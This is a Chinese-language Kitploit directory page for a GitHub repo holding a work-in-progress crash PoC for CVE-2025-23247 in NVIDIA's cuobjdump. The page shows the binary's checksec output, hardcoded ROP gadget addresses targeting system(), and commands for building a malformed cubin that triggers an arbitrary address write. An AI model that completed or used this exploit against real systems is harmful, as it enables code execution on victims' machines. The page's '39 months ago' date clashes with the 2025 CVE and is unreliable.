Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/spiralbl0ck/cve-2025-23247
漏洞分析漏洞利用逆向工程调试器Payload 开发二进制利用
GitHubspiralbl0ck/cve-2025-23247

CVE-2025-23247

针对 CVE-2025-23247 的工作进行中。目前只是一个崩溃 PoC,它表明我们可以控制缓冲区和偏移量,因此我们实现了 aaw。

查看仓库
39个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-23247

与 @reubensammut 的史诗级合作 :) 一如既往 :) CVE-2025-23247 的 WIP。目前只是崩溃 PoC,表明我们控制了缓冲区和偏移量,因此获得了 aaw(任意地址写)。 漏洞来自 https://talosintelligence.com/vulnerability_reports/TALOS-2025-2151

checksec ./cuobjdump [*] '/home/vlad/cuobjdump' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000)

反正我们没有 PIE,所以

uint64_t system_plt = 0x401d90; uint64_t pop_rdi_ret = 0x402d1b; uint64_t ret_gadget = 0x402d1c; // Just a ret

崩溃点 Screenshot_from_2025-11-20_16-00-41 png-2

gcc -o modify_simple modify_simple.c vlad@Vlad-PC:~$ ./modify_simple simple.cubin modified_simple2.cubin Created modified_simple2.cubin with vulnerable .nv_debug_source section Run: ./cuobjdump --dump-elf modified_simple2.cubin

而对于 CUDA 内核

nvcc -ptx simple.cu -o simple.ptx nvcc -cubin simple.ptx -o simple.cubin --generate-line-info or nvcc -cubin simple.cu -o simple.cubin --generate-line-info

下载工具